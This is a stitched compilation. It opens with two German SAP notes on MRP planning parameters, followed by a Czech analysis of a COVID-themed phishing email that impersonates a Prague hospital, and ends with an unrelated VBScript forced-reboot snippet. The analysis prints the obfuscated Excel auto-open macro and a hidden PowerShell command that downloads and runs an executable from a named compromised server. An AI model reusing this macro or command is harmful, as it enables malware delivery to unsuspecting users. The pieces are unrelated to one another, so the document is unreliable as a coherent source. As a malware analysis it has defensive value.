206666 - MRP: Steuerungsparameter bei der Planung

Symptom

Auf dem Einstiegsbild der Bedarfsplanung (MDBT / MD01 / MD02 / MD03 / MDBS / MD40 etc.) können verschiedene Parameter gesetzt werden.
Die Wirkung dieser Parameter im Zusammenspiel mit den Einstellungen aus den Stammdaten und dem Customizing ist nicht klar bzw. führt zu unerwarteten Ergebnissen.

Weitere Begriffe

MRP, Bedarfsplanungslauf, Planungslauf, Bestellanforderung, BANF, Planauftrag, PLAF, PLAUF, Lieferplaneinteilung, LP-EIN, Netchange, Neuplanung, Planungsmodus, Dispositionsliste, Dispoliste, Terminierung, ...
Ursache und Voraussetzungen

Das Verhalten des MRP-Laufs wird von vielen Parametern beeinflußt.
Hierbei ist z.B. nicht immer klar, wann einzelne Parameter aus dem Einstiegsbild der Planung übersteuert werden durch Einstellungen aus den Stammdaten oder dem Customizing, auch wenn dies in der Regel an den entsprechenden Stellen dokumentiert sein sollte.

Lösung

Dieser Hinweis soll eine Zusammenstellung sein darüber, wie die einzelnen Parameter das Verhalten des MRPs beeinflussen und was für einen Einfluß darüber hinaus die Einstellungen aus den Stammdaten bzw. dem Customizing haben.
Viele Informationen, die über den Umfang dieses Hinweises hinausgehen,
findet man in der Dokumentation bzw. der erweiterten Hilfe zu den
entsprechenden Feldern.
Bei Fragen, die über diesen Hinweis hinausgehen, sollten auf jeden Fall die weiterführenden Hinweise und die Dokumentation beachtet werden!
Bzgl. der Parameter bei der automatischen Planung z.B. beim Anlegen eines Kundenauftrags (MRP per RFC) beachten Sie bitte den Hinweis 162961.
Zu den Parametern auf dem Einstiegsbild der Planung:
  1. Über den Verarbeitungsschlüssel wird gesteuert, welche Materialien überhaupt geplant werden (Gesamtplanung) und in welchem Horizont Bedarfe durch neue Beschaffungsvorschläge gedeckt werden.
    1. Gesamtplanung:
      1. NEUPL: Alle Materialien, die einen MDVM-Satz haben, werden geplant.
      2. NETCH: Alle Materialien, die eine NETCH-Planungsvormerkung haben (disporelevante Änderung seit der letzten Planung), werden geplant.
      3. NETPL: Nur Materialien, die auch eine NETPL-Planungsvormerkung haben (disporelevante Änderung im Planungshorizont seit der letzten Planung), werden geplant und Bedarfe im Planungshorizont werden gedeckt.
    2. Einzelplanung (nur NETCH oder NETPL möglich):
      1. NETCH: Das Material wird komplett geplant.
      2. NETPL: Bedarfe im Planungshorizont werden gedeckt.
  2. Erstellungskennzeichen für die Disposition: (siehe Hinweis 23922)
    Für die Gesamtplanung gilt:
    Die eingegebenen Erstellungskenzeichen dienen als Vorschlagswerte. Für Materialien mit einer Dispositionsgruppe gelten (falls vorhanden) die Werte aus der Dispositionsgruppe.
    Das Erstellungskennzeichen für Lieferplaneinteilungen kann zusätzlich pro Werk festgelegt sein. Dieses wird verwendet, wenn über die Dispositionsgruppe nichts festgelegt wurde.

    Die Priorität ist also wie folgt:
    1. Dispositionsgruppe
    2. Werk
    3. Einstiegsbild

    Für die Einzelplanung gelten grundsätzlich die eingegebenen Steuerungsparameter.

    Ergänzungen:
    1. Beschaffungsart 'X' wird zunächst behandelt wie 'E'. Für Beschaffungsart 'E' werden grundsätzlich Planaufträge erzeugt.
    2. Damit Lieferplaneinteilungen erzeugt werden, muß das Kennzeichen 'Orderbuchverwendung in der Disposition' im Orderbuch auf '2' gesetzt sein.

  3. Dispoliste erstellen:
    Bei 'Grundsätzlich keine Dispoliste' wird die alte Dispoliste gelöscht und keine neue erstellt. Bei 'In Abhängigkeit von Ausnahmemeldungen' wird nur dann eine Dispoliste erzeugt, wenn während der Planung eine Ausnahmemeldung auftritt, für die Customizing (OMD3) das Kennzeichen 'Dispoliste erstellen' angekreuzt ist.

  4. Planungsmodus:
    Der Planungsmodus hat entscheidenden Einfluß auf die Performance der Bedarfsplanung. Es sollte grundsätzlich mit Planungsmodus '1' geplant werden.
    Siehe hierzu auch die Hinweise 78867 und 135788 (Planungsmodus '3' NICHT verwenden!)

  5. Terminierung:
    Hierdurch wird entschieden, ob für neu erstellte Planaufträge eine Durchlaufterminierung durchgeführt wird.

53235 - MD01: Planaufträge im Eröffnungshorizont bleiben

Symptom

Dei Bedarfsplanung wird mit dem Banf-Erstellungskennzeichen '2' durchgeführt, d.h. innerhalb des Eröffungshorizontes erstellt die Bedarfsplanung für fremdbeschaffte Materialien Bestellanforderungen, außerhalb Planaufträge.

Materialien, die keine dispositive Änderung erfahren haben, d.h. es haben sich weder die Bedarfe noch die Bestände noch der Materialstamm geändert, nehmen an einer Veränderungsplanung mit Transaktion MD01 und Verarbeitungsschlüssel NETCH nicht teil. Dies gilt auch dann, wenn ein früher generierter Planauftrag inzwischen in den Eröffnungshorizont hinein gewandert ist und die Bedarfsplanung nun eine Bestellanforderung generieren würde.

Weitere Begriffe

MD01, Doku, Planungsvormerkung

Ursache und Voraussetzungen

Wandert der Planauftrag in den Eröffnungshorizont, so wird hierbei keine Planungsvormerkung erzegt. Das Material nimmt an der nächsten Bedarfsplanung mit MD01 und Verarbeitungsschlüssel NETCH nicht teil.

Lösung

Bitte verwenden Sie Transaktion MD15 um Planaufträge in Bestellanforderungen umzusetzen. Die Transaktion MD15 sollte regelmäßig durchgeführt werden um alle Planaufträge innerhalb des Eröffnungshorizontes umzusetzen. Bitte stimmen Sie die Länge des Eröffnungshorizontes ab auf den Rhythmus, in dem Sie Transaktion MD15 durchführen.

Alternativ kann mit dem Dispositionsmerkmal 'Plangesteuert mit Rhythmus' gearbeitet werden. Hierbei wird das Material nach jeder dispositiven Änderung geplant und zusätzlich an den durch den Dispositionsrhythmus definierten Terminen. Hierbei sollte der Eröffnungshorizont auf die Dauer des Dispositionsrhythmuses abgestimmt werden.

Email zaslany uzivateli, odkaz presmerovan na polikliniku Tachov na excelovy soubor.
1
2
3
4
5
6
7
8
9
10
11
12
13
Von:	"VFN" <Tato e-mailová adresa je chráněna před spamboty. Pro její zobrazení musíte mít povolen Javascript.>
An:	Tato e-mailová adresa je chráněna před spamboty. Pro její zobrazení musíte mít povolen Javascript.
Datum:	26.10.2020 02:34
Betreff:	Výsledky testů č. 2910-211
 
Dobrý den,
 
v odkazu níže naleznete výsledky svých testů na CoVid-19 z naší laboratoře.
Výsledky: https://vfn.cz/laborator/vysledky-online/e939rd12313
 
Tento email byl vygenerován automatickým systémem, neodpovídejte na něj prosím.
Vojenská fakultní nemocnice Praha.
Určeno pro: Tato e-mailová adresa je chráněna před spamboty. Pro její zobrazení musíte mít povolen Javascript. Datum odeslání: 10/25/2020 11:07:36 pm 

Makrem jsou nacteny prikazy z bunek v Excelu, na pozadi je stazen novy soubor s virem a nasledne spusten v pocitaci. Jedna se jednoduchy zpusob, kdy si uzivatel stahne zavirovany soubor do pocitace sam.

Prikazem Workbook_Open()" je spusteno makro automaticky po otevreni souboru v Excelu
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
Rem Attribute VBA_ModuleType=VBADocumentModule
Option VBASupport 1
Private Sub Workbook_Open()
Range("A1:J22").Select
Selection.Borders(xlDiagonalDown).LineStyle = xlNone
Selection.Borders(xlDiagonalUp).LineStyle = xlNone
With Selection.Borders(xlEdgeLeft)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
gftmfltpedmmmalshcqxsndrignapvopsgsolkaw = Range("A8").Value
With Selection.Borders(xlEdgeTop)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Set mwzlxrhxfvlttocscceyxszjpxugixhxbukworur  = CreateObject(Range("A9").Value)
With Selection.Borders(xlEdgeBottom)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Dim xdiydesrblamreokyebyuewfhgleojduyqoswjlv
With Selection.Borders(xlEdgeRight)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
xdiydesrblamreokyebyuewfhgleojduyqoswjlv = mwzlxrhxfvlttocscceyxszjpxugixhxbukworur.Create(gftmfltpedmmmalshcqxsndrignapvopsgsolkaw)
End Sub

Prikazy v skrytych bunkach v Excelu
1
2
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass  -command " & { iwr http://www.poltc.cz/zackova/thiss.exe -OutFile C:\Users\Public\Downloads\lrozf.exe}; & {Start-Process -FilePath "C:\Users\Public\Downloads\lrozf.exe"}"
winmgmts:win32_Process


Co virus dela, nevim. V analyzy zdroje byl soubor ze serveru polikliniky Tachov smazan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
'WMI - Easy Shutdown
'If you have gotten tired of having to click several items just to
'shutdown your PC or laptop, save this script to a .vbs file and
'create an icon for it.   It will shutdown your machine with just
'one click.   No prompts, no waiting, just power down.  
'I've also included a few of the other constants just in case you need a slight variation.
Sub ForceReBoot()
   nLogOff                = 0     'Alternative actions to force reboot
   nReboot               = 2
   nForceLogOff         = 4
   nForceReboot        = 6
   nPowerDown         = 8
   nForcePowerDown = 12
   Set oOS = GetObject("winmgmts:{(Shutdown)}").ExecQuery("Select * from Win32_OperatingSystem")
   For Each oOperatingSystem in oOS
      oOperatingSystem.Win32Shutdown(nForceReboot)
   Next
End sub' ForceReBoot
 
Sub SleepDelay ()
For i = 1 to 5
'  Wait 10 seconds (1000ms = 1 second)
   Wscript.Sleep 10*(1000)
Next 'i
 
End Sub 'SleepDelay